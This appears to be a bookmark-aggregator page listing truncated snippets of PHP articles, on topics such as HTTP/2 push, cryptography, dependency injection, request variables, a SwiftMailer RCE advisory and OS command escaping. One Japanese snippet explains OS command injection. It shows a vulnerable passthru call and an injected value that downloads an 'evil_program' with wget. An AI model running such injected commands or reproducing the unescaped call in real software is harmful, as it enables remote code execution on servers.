DigitalOcean provides cloud products for every stage of your journey. Get started with $200 in free credit! If you’ve been reading at all about HTTP/2, then you’ve likely heard about server push. If not, here’s the gist of it: Server push lets you preemptively send an asset when the client requests another. To use it, you need an HTTP/2-capable web server, and then you just set a Link header for t
The latest information from the team that develops cryptographically secure PHP software. Is Your Cryptography Reliable? Our team specializes in studying real world cryptography implementations to assure their correctness and security. Why You Want to Hire Our Company Contact Us Six months ago, I wrote a blog post titled Let's Make 2017 the Year of Simply Secure PHP Cryptography, which at the time
Babel preset for converting PHP syntax to JavaScript. It can run subset of PHP in the browser or in Node.js. Expanding Atwood's Law.
Capsule Clean, concise, composable dependency injection for PHP 8. Installation Install Capsule via Composer: composer require capsule/di ^4.0 The Github repository is at capsulephp/di. Autowiring Container Capsule will auto-inject typehinted constructor parameters. use Capsule\Di\Container; use Capsule\Di\Definitions; class Foo implements FooInterface { public function __construct( protected Bar
$_GET は名前だけでは HTTP GET メッセージをあらわすものとして考えてしまいがちですが、実際には URI クエリパラメーターであり、GET リクエスト以外にも使うことができます。 $_POST はリクエストボディをあらわしますが、Content-Type ヘッダーの値が x-www-form-urlencoded もしくは multipart/form-data であるときにかぎられます。たとえば Content-Type ヘッダーの値が application/json である場合には読み込み専用のストリーム (php://input) を利用する必要があります。 apfd (Always Populate Form Data) エクステンションを導入すれば、HTTP メッセージの Content-Type の値が multipart/form-data もしくは appli
概要 リモートコード実行の脆弱性 (CVE-2016-10074) に対応するために SwiftMailer 5.4.5 がリリースされました。脆弱性の条件に該当するプロジェクトはバージョンアップやアプリケーションの修正が求められます。 該当するプロジェクト sendmail もしくは sendmail と互換性があり、-X オプションが利用可能であるプログラムを使う (postfix は -X を無効にしている) From、Sender、ReturnPath フィールドの値にユーザーからの入力を使う lsmith さんのツイートによれば、Symfony の場合、transport で smtp の代わりに mail を使っているプロジェクトが該当します。 検証コード 脆弱性を説明するドキュメントに記載されているコードは次のようなものです。 // sender フィールドをもつ問い合わせフ
(Last Updated On: 2018年8月16日)OSコマンドのエスケープの続きです。OSコマンドインジェクションを防ぐための、OSコマンドのエスケープはSQLのエスケープに比べるとかなり難しいです。 難しくなる理由は多くの不定となる条件に依存する事にあります。 OSコマンドを実行するシェルはシステムによって異なる シェルはプログラミング言語+複雑なエスケープ仕様を持っている(コマンド以後はクオートなしでも文字リテラルのパラメーター+各種展開処理) WebアプリはCGIインターフェースで動作するため環境変数にインジェクションできる コマンドパラメーターの取り扱いはコマンド次第である 実行されるコマンドの実装により、間接インジェクションが可能になる SQLの場合、出力先のシステムは一定です。PostgreSQL用にエスケープした文字列をMySQLで実行したり、MySQL用にエスケープ
(Last Updated On: 2022年7月25日)プログラムからOSコマンドを実行する場合、エスケープ処理を行わないと任意コマンドが実行される危険性があります。 今回はOSコマンドのエスケープについてです。 OSコマンドインジェクション OSコマンドインジェクションはプログラムから実行するコマンドに、攻撃用文字列を挿入(インジェクション)して意図しないコマンドを実行させる攻撃です。 例えば、次のようなLinuxシステムのディレクトリの内容を表示させるプログラム <?php passthru('ls -l '.$_GET['dir']); (任意のディレクトリ内容を表示できる脆弱性はここでは考慮しない) に不正なコマンドを実行させるのはとても簡単です。$_GET[‘dir’]に . ; cd /tmp; wget http://example.com/evil_program; ch
escapeshellrce.md Paul Buonopane paul@namepros.com at NamePros PGP: https://keybase.io/zenexer I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome. This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's CVE-2016-10033, CVE-2016-10045, and CVE-2016-10074. It assumes prior understanding of these vulnerabilities. This
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く